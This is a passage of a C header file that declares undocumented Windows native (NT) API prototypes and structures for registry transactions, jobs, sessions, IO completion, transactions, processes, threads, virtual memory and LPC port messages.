PIO_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_ ULONG CompletionFilter,\n _In_ BOOLEAN WatchTree,\n _Out_writes_bytes_opt_(BufferSize) PVOID Buffer,\n _In_ ULONG BufferSize,\n _In_ BOOLEAN Asynchronous);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLockRegistryKey(\n _In_ HANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nNtCreateRegistryTransaction(\n _Out_ PHANDLE Handle,\n _In_ ACCESS_MASK DesiredAccess, //generic + TRANSACTION_*\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ DWORD Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nNtCommitRegistryTransaction(\n _In_ HANDLE RegistryHandle,\n _In_ BOOL Wait);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenRegistryTransaction(\n _Out_ PHANDLE RegistryHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI \nNtRollbackRegistryTransaction(\n _In_ HANDLE RegistryHandle,\n _In_ BOOL Wait);\n\n\n/************************************************************************************\n*\n* Job API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAssignProcessToJobObject(\n _In_ HANDLE JobHandle,\n _In_ HANDLE ProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateJobObject(\n _Out_ PHANDLE JobHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateJobSet(\n _In_ ULONG NumJob,\n _In_reads_(NumJob) PJOB_SET_ARRAY UserJobSet,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtIsProcessInJob(\n _In_ HANDLE ProcessHandle,\n _In_opt_ HANDLE JobHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenJobObject(\n _Out_ PHANDLE JobHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationJobObject(\n _In_opt_ HANDLE JobHandle,\n _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,\n _Out_writes_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,\n _In_ ULONG JobObjectInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationJobObject(\n _In_ HANDLE JobHandle,\n _In_ JOBOBJECTINFOCLASS JobObjectInformationClass,\n _In_reads_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,\n _In_ ULONG JobObjectInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateJobObject(\n _In_ HANDLE JobHandle,\n _In_ NTSTATUS ExitStatus);\n\n/************************************************************************************\n*\n* Session API.\n*\n************************************************************************************/\n\ntypedef struct _SESSION_OBJECT {\n KEVENT Event;\n PVOID SessionGlobal; //MM_SESSION_SPACE ptr\n} SESSION_OBJECT, * PSESSION_OBJECT;\n\n//taken from ph2\n\ntypedef enum _IO_SESSION_EVENT {\n IoSessionEventIgnore,\n IoSessionEventCreated,\n IoSessionEventTerminated,\n IoSessionEventConnected,\n IoSessionEventDisconnected,\n IoSessionEventLogon,\n IoSessionEventLogoff,\n IoSessionEventMax\n} IO_SESSION_EVENT;\n\ntypedef enum _IO_SESSION_STATE {\n IoSessionStateCreated = 1,\n IoSessionStateInitialized,\n IoSessionStateConnected,\n IoSessionStateDisconnected,\n IoSessionStateDisconnectedLoggedOn,\n IoSessionStateLoggedOn,\n IoSessionStateLoggedOff,\n IoSessionStateTerminated,\n IoSessionStateMax\n} IO_SESSION_STATE;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenSession(\n _Out_ PHANDLE SessionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtNotifyChangeSession(\n _In_ HANDLE SessionHandle,\n _In_ ULONG ChangeSequenceNumber,\n _In_ PLARGE_INTEGER ChangeTimeStamp,\n _In_ IO_SESSION_EVENT Event,\n _In_ IO_SESSION_STATE NewState,\n _In_ IO_SESSION_STATE PreviousState,\n _In_reads_bytes_opt_(PayloadSize) PVOID Payload,\n _In_ ULONG PayloadSize);\n\n/************************************************************************************\n*\n* IO Completion API.\n*\n************************************************************************************/\n\ntypedef enum _IO_COMPLETION_INFORMATION_CLASS {\n IoCompletionBasicInformation\n} IO_COMPLETION_INFORMATION_CLASS;\n\ntypedef struct _IO_COMPLETION_BASIC_INFORMATION {\n LONG Depth;\n} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateIoCompletion(\n _Out_ PHANDLE IoCompletionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG Count);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenIoCompletion(\n _Out_ PHANDLE IoCompletionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryIoCompletion(\n _In_ HANDLE IoCompletionHandle,\n _In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,\n _Out_writes_bytes_(IoCompletionInformationLength) PVOID IoCompletionInformation,\n _In_ ULONG IoCompletionInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIoCompletion(\n _In_ HANDLE IoCompletionHandle,\n _In_opt_ PVOID KeyContext,\n _In_opt_ PVOID ApcContext,\n _In_ NTSTATUS IoStatus,\n _In_ ULONG_PTR IoStatusInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetIoCompletionEx(\n _In_ HANDLE IoCompletionHandle,\n _In_ HANDLE IoCompletionPacketHandle,\n _In_opt_ PVOID KeyContext,\n _In_opt_ PVOID ApcContext,\n _In_ NTSTATUS IoStatus,\n _In_ ULONG_PTR IoStatusInformation);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRemoveIoCompletion(\n _In_ HANDLE IoCompletionHandle,\n _Out_ PVOID *KeyContext,\n _Out_ PVOID *ApcContext,\n _Out_ PIO_STATUS_BLOCK IoStatusBlock,\n _In_opt_ PLARGE_INTEGER Timeout);\n\n/************************************************************************************\n*\n* Transactions API.\n*\n************************************************************************************/\n\n//TmTx\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTransaction(\n _Out_ PHANDLE TransactionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ LPGUID Uow,\n _In_opt_ HANDLE TmHandle,\n _In_ ULONG CreateOptions,\n _In_ ULONG IsolationLevel,\n _In_ ULONG IsolationFlags,\n _In_opt_ PLARGE_INTEGER Timeout,\n _In_opt_ PUNICODE_STRING Description);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenTransaction(\n _Out_ PHANDLE TransactionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ LPGUID Uow,\n _In_opt_ HANDLE TmHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtRollbackTransaction(\n _In_ HANDLE TransactionHandle,\n _In_ BOOLEAN Wait);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCommitTransaction(\n _In_ HANDLE TransactionHandle,\n _In_ BOOLEAN Wait);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFreezeTransactions(\n _In_ PLARGE_INTEGER FreezeTimeout,\n _In_ PLARGE_INTEGER ThawTimeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtThawTransactions(\n VOID);\n\n//TmRm\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateResourceManager(\n _Out_ PHANDLE ResourceManagerHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ HANDLE TmHandle,\n _In_opt_ LPGUID ResourceManagerGuid,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ ULONG CreateOptions,\n _In_opt_ PUNICODE_STRING Description);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenResourceManager(\n _Out_ PHANDLE ResourceManagerHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ HANDLE TmHandle,\n _In_opt_ LPGUID ResourceManagerGuid,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\n//TmEn\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEnlistment(\n _Out_ PHANDLE EnlistmentHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ HANDLE ResourceManagerHandle,\n _In_ HANDLE TransactionHandle,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ ULONG CreateOptions,\n _In_ NOTIFICATION_MASK NotificationMask,\n _In_opt_ PVOID EnlistmentKey);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenEnlistment(\n _Out_ PHANDLE EnlistmentHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ HANDLE ResourceManagerHandle,\n _In_ LPGUID EnlistmentGuid,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\n//TmTm\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateTransactionManager(\n _Out_ PHANDLE TmHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ PUNICODE_STRING LogFileName,\n _In_ ULONG CreateOptions,\n _In_ ULONG CommitStrength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenTransactionManager(\n _Out_ PHANDLE TmHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ PUNICODE_STRING LogFileName,\n _In_opt_ LPGUID TmIdentity,\n _In_ ULONG OpenOptions);\n\n/************************************************************************************\n*\n* Performance Counter.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryPerformanceCounter(\n _Out_ PLARGE_INTEGER PerformanceCounter,\n _Out_opt_ PLARGE_INTEGER PerformanceFrequency);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtConvertBetweenAuxiliaryCounterAndPerformanceCounter(\n _In_ BOOLEAN ConvertAuxiliaryToPerformanceCounter,\n _In_ PLARGE_INTEGER PerformanceOrAuxiliaryCounterValue,\n _Out_ PLARGE_INTEGER ConvertedValue,\n _Out_opt_ PLARGE_INTEGER ConversionError);\n\n/************************************************************************************\n*\n* Process and Thread API.\n*\n************************************************************************************/\n\ntypedef struct _INITIAL_TEB\n{\n struct\n {\n PVOID OldStackBase;\n PVOID OldStackLimit;\n } OldInitialTeb;\n PVOID StackBase;\n PVOID StackLimit;\n PVOID StackAllocationBase;\n} INITIAL_TEB, * PINITIAL_TEB;\n\n#define PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS 0x00000001\n\n#define QUEUE_USER_APC_FLAGS_NONE 0\n#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 1\n\n//\n// NtCreateProcessEx specific flags.\n//\n#define PS_REQUEST_BREAKAWAY 1\n#define PS_NO_DEBUG_INHERIT 2\n#define PS_INHERIT_HANDLES 4\n#define PS_LARGE_PAGES 8\n#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \\\n PS_NO_DEBUG_INHERIT | \\\n PS_INHERIT_HANDLES | \\\n PS_LARGE_PAGES)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetNextProcess(\n _In_opt_ HANDLE ProcessHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ ULONG HandleAttributes,\n _In_ ULONG Flags,\n _Out_ PHANDLE NewProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetNextThread(\n _In_ HANDLE ProcessHandle,\n _In_ HANDLE ThreadHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ ULONG HandleAttributes,\n _In_ ULONG Flags,\n _Out_ PHANDLE NewThreadHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProcess(\n _Out_ PHANDLE ProcessHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ParentProcess,\n _In_ BOOLEAN InheritObjectTable,\n _In_opt_ HANDLE SectionHandle,\n _In_opt_ HANDLE DebugPort,\n _In_opt_ HANDLE ExceptionPort);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProcessEx(\n _Out_ PHANDLE ProcessHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ParentProcess,\n _In_ ULONG Flags,\n _In_opt_ HANDLE SectionHandle,\n _In_opt_ HANDLE DebugPort,\n _In_opt_ HANDLE ExceptionPort,\n _In_ BOOLEAN InJob);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateUserProcess(\n _Out_ PHANDLE ProcessHandle,\n _Out_ PHANDLE ThreadHandle,\n _In_ ACCESS_MASK ProcessDesiredAccess,\n _In_ ACCESS_MASK ThreadDesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes,\n _In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes,\n _In_ ULONG ProcessFlags,\n _In_ ULONG ThreadFlags,\n _In_opt_ PVOID ProcessParameters,\n _Inout_ PPS_CREATE_INFO CreateInfo,\n _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateThread(\n _Out_ PHANDLE ThreadHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ProcessHandle,\n _Out_ PCLIENT_ID ClientId,\n _In_ PCONTEXT ThreadContext,\n _In_ PINITIAL_TEB InitialTeb,\n _In_ BOOLEAN CreateSuspended);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateThreadEx(\n _Out_ PHANDLE ThreadHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ProcessHandle,\n _In_ PVOID StartRoutine,\n _In_opt_ PVOID Argument,\n _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*\n _In_opt_ ULONG_PTR ZeroBits,\n _In_opt_ SIZE_T StackSize,\n _In_opt_ SIZE_T MaximumStackSize,\n _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenProcess(\n _Out_ PHANDLE ProcessHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ PCLIENT_ID ClientId);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateProcess(\n _In_opt_ HANDLE ProcessHandle,\n _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSuspendProcess(\n _In_ HANDLE ProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtResumeProcess(\n _In_ HANDLE ProcessHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateProcessStateChange(\n _Out_ PHANDLE ProcessStateChangeHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ProcessHandle,\n _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtChangeProcessState(\n _In_ HANDLE ProcessStateChangeHandle,\n _In_ HANDLE ProcessHandle,\n _In_ PROCESS_STATE_CHANGE_TYPE StateChangeType,\n _In_opt_ PVOID ExtendedInformation,\n _In_opt_ SIZE_T ExtendedInformationLength,\n _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSuspendThread(\n _In_ HANDLE ThreadHandle,\n _Out_opt_ PULONG PreviousSuspendCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtResumeThread(\n _In_ HANDLE ThreadHandle,\n _Out_opt_ PULONG PreviousSuspendCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateThreadStateChange(\n _Out_ PHANDLE ThreadStateChangeHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ HANDLE ThreadHandle,\n _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtChangeThreadState(\n _In_ HANDLE ThreadStateChangeHandle,\n _In_ HANDLE ThreadHandle,\n _In_ THREAD_STATE_CHANGE_TYPE StateChangeType,\n _In_opt_ PVOID ExtendedInformation,\n _In_opt_ SIZE_T ExtendedInformationLength,\n _In_opt_ ULONG64 Reserved);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenThread(\n _Out_ PHANDLE ThreadHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_opt_ PCLIENT_ID ClientId);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTerminateThread(\n _In_opt_ HANDLE ThreadHandle,\n _In_ NTSTATUS ExitStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtImpersonateThread(\n _In_ HANDLE ServerThreadHandle,\n _In_ HANDLE ClientThreadHandle,\n _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetContextThread(\n _In_ HANDLE ThreadHandle,\n _In_ PCONTEXT ThreadContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtGetContextThread(\n _In_ HANDLE ThreadHandle,\n _Inout_ PCONTEXT ThreadContext);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationThread(\n _In_ HANDLE ThreadHandle,\n _In_ THREADINFOCLASS ThreadInformationClass,\n _Out_writes_bytes_(ThreadInformationLength) PVOID ThreadInformation,\n _In_ ULONG ThreadInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationThread(\n _In_ HANDLE ThreadHandle,\n _In_ THREADINFOCLASS ThreadInformationClass,\n _In_reads_bytes_(ThreadInformationLength) PVOID ThreadInformation,\n _In_ ULONG ThreadInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationProcess(\n _In_ HANDLE ProcessHandle,\n _In_ PROCESSINFOCLASS ProcessInformationClass,\n _Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,\n _In_ ULONG ProcessInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationProcess(\n _In_ HANDLE ProcessHandle,\n _In_ PROCESSINFOCLASS ProcessInformationClass,\n _In_reads_bytes_(ProcessInformationLength) PVOID ProcessInformation,\n _In_ ULONG ProcessInformationLength);\n\ntypedef VOID(*PPS_APC_ROUTINE) (\n _In_opt_ PVOID ApcArgument1,\n _In_opt_ PVOID ApcArgument2,\n _In_opt_ PVOID ApcArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueueApcThread(\n _In_ HANDLE ThreadHandle,\n _In_ PPS_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcArgument1,\n _In_opt_ PVOID ApcArgument2,\n _In_opt_ PVOID ApcArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueueApcThreadEx(\n _In_ HANDLE ThreadHandle,\n _In_opt_ HANDLE ReserveHandle,\n _In_ PPS_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID ApcArgument1,\n _In_opt_ PVOID ApcArgument2,\n _In_opt_ PVOID ApcArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueueApcThreadEx2(\n _In_ HANDLE ThreadHandle,\n _In_ HANDLE UserApcReserveHandle,\n _In_ ULONG QueueUserApcFlags, /*QUEUE_USER_APC_FLAGS*/\n _In_ PPS_APC_ROUTINE ApcRoutine,\n _In_opt_ PVOID SystemArgument1,\n _In_opt_ PVOID SystemArgument2,\n _In_opt_ PVOID SystemArgument3);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtYieldExecution(\n VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtTestAlert(\n VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAlertThread(\n _In_ HANDLE ThreadHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAlertResumeThread(\n _In_ HANDLE ThreadHandle,\n _Out_opt_ PULONG PreviousSuspendCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAlertThreadByThreadId(\n _In_ HANDLE ThreadId);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitForAlertByThreadId(\n _In_ PVOID Address,\n _In_opt_ PLARGE_INTEGER Timeout);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtDelayExecution(\n _In_ BOOLEAN Alertable,\n _In_opt_ PLARGE_INTEGER DelayInterval);\n\nNTSYSAPI\nULONG\nNTAPI\nNtGetCurrentProcessorNumber(\n VOID);\n\n/************************************************************************************\n*\n* License API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryLicenseValue(\n _In_ PUNICODE_STRING ValueName,\n _Out_opt_ PULONG Type,\n _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data,\n _In_ ULONG DataSize,\n _Out_ PULONG ResultDataSize);\n\n/************************************************************************************\n*\n* Virtual Memory API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID *BaseAddress,\n _In_ ULONG_PTR ZeroBits,\n _Inout_ PSIZE_T RegionSize,\n _In_ ULONG AllocationType,\n _In_ ULONG Protect);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtAllocateVirtualMemoryEx(\n _In_ HANDLE ProcessHandle,\n _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress,\n _Inout_ PSIZE_T RegionSize,\n _In_ ULONG AllocationType,\n _In_ ULONG PageProtection,\n _Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,\n _In_ ULONG ExtendedParameterCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFreeVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _Inout_ PVOID *BaseAddress,\n _Inout_ PSIZE_T RegionSize,\n _In_ ULONG FreeType);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress,\n _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,\n _Out_writes_bytes_(MemoryInformationLength) PVOID MemoryInformation,\n _In_ SIZE_T MemoryInformationLength,\n _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _In_ VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass,\n _In_ ULONG_PTR NumberOfEntries,\n _In_reads_(NumberOfEntries) PMEMORY_RANGE_ENTRY VirtualAddresses,\n _In_reads_bytes_(VmInformationLength) PVOID VmInformation,\n _In_ ULONG VmInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress,\n _Out_writes_bytes_(BufferSize) PVOID Buffer,\n _In_ SIZE_T BufferSize,\n _Out_opt_ PSIZE_T NumberOfBytesRead);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReadVirtualMemoryEx(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress,\n _Out_writes_bytes_(BufferSize) PVOID Buffer,\n _In_ SIZE_T BufferSize,\n _Out_opt_ PSIZE_T NumberOfBytesRead,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWriteVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress,\n _In_reads_bytes_(BufferSize) PVOID Buffer,\n _In_ SIZE_T BufferSize,\n _Out_opt_ PSIZE_T NumberOfBytesWritten);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtProtectVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _Inout_ PVOID *BaseAddress,\n _Inout_ PSIZE_T RegionSize,\n _In_ ULONG NewProtect,\n _Out_ PULONG OldProtect);\n\n#define MAP_PROCESS 1L\n#define MAP_SYSTEM 2L\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtLockVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _Inout_ PVOID *BaseAddress,\n _Inout_ PSIZE_T RegionSize,\n _In_ ULONG MapType);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtUnlockVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _Inout_ PVOID *BaseAddress,\n _Inout_ PSIZE_T RegionSize,\n _In_ ULONG MapType);\n\nNTSTATUS\nNTAPI\nNtFlushVirtualMemory(\n _In_ HANDLE ProcessHandle,\n _Inout_ PVOID* BaseAddress,\n _Inout_ PSIZE_T RegionSize,\n _Out_ struct _IO_STATUS_BLOCK* IoStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtFlushInstructionCache(\n _In_ HANDLE ProcessHandle,\n _In_opt_ PVOID BaseAddress,\n _In_ SIZE_T Length);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreatePagingFile(\n _In_ PUNICODE_STRING PageFileName,\n _In_ PLARGE_INTEGER MinimumSize,\n _In_ PLARGE_INTEGER MaximumSize,\n _In_ ULONG Priority);\n\n/************************************************************************************\n*\n* Port API.\n*\n************************************************************************************/\n\ntypedef struct _PORT_VIEW {\n\n ULONG Length; // Size of this structure\n HANDLE SectionHandle; // Handle to section object with\n // SECTION_MAP_WRITE and SECTION_MAP_READ\n ULONG SectionOffset; // The offset in the section to map a view for\n // the port data area. The offset must be aligned \n // with the allocation granularity of the system.\n SIZE_T ViewSize; // The size of the view (in bytes)\n PVOID ViewBase; // The base address of the view in the creator\n // \n PVOID ViewRemoteBase; // The base address of the view in the process\n // connected to the port.\n} PORT_VIEW, * PPORT_VIEW;\n\ntypedef struct _REMOTE_PORT_VIEW {\n\n ULONG Length; // Size of this structure\n SIZE_T ViewSize; // The size of the view (bytes)\n PVOID ViewBase; // Base address of the view\n\n} REMOTE_PORT_VIEW, * PREMOTE_PORT_VIEW;\n\ntypedef struct _PORT_MESSAGE {\n union {\n struct {\n CSHORT DataLength;\n CSHORT TotalLength;\n } s1;\n ULONG Length;\n } u1;\n union {\n struct {\n CSHORT Type;\n CSHORT DataInfoOffset;\n } s2;\n ULONG ZeroInit;\n } u2;\n union {\n CLIENT_ID ClientId;\n double DoNotUseThisField; // Force quadword alignment\n } u3;\n ULONG MessageId;\n union {\n SIZE_T ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message\n ULONG CallbackId; // Only valid on LPC_REQUEST message\n } u4;\n} PORT_MESSAGE, *PPORT_MESSAGE;\n\ntypedef struct _PORT_MESSAGE32 {\n union {\n struct {\n CSHORT DataLength;\n CSHORT TotalLength;\n } s1;\n ULONG Length;\n } u1;\n union {\n struct {\n CSHORT Type;\n CSHORT DataInfoOffset;\n } s2;\n ULONG ZeroInit;\n } u2;\n union {\n CLIENT_ID32 ClientId;\n double DoNotUseThisField; // Force quadword alignment\n } u3;\n ULONG MessageId;\n union {\n ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message\n ULONG CallbackId; // Only valid on LPC_REQUEST message\n } u4;\n} PORT_MESSAGE32, * PPORT_MESSAGE32;\n\ntypedef struct _PORT_MESSAGE64\n{\n union\n {\n struct\n {\n CSHORT DataLength;\n CSHORT TotalLength;\n } s1;\n ULONG Length;\n } u1;\n union\n {\n struct\n {\n CSHORT Type;\n CSHORT DataInfoOffset;\n } s2;\n ULONG ZeroInit;\n } u2;\n union\n {\n CLIENT_ID64 ClientId;\n double DoNotUseThisField;\n };\n ULONG MessageId;\n union\n {\n ULONGLONG ClientViewSize; // only valid for LPC_CONNECTION_REQUEST messages\n ULONG CallbackId; // only valid for LPC_REQUEST messages\n };\n} PORT_MESSAGE64, * 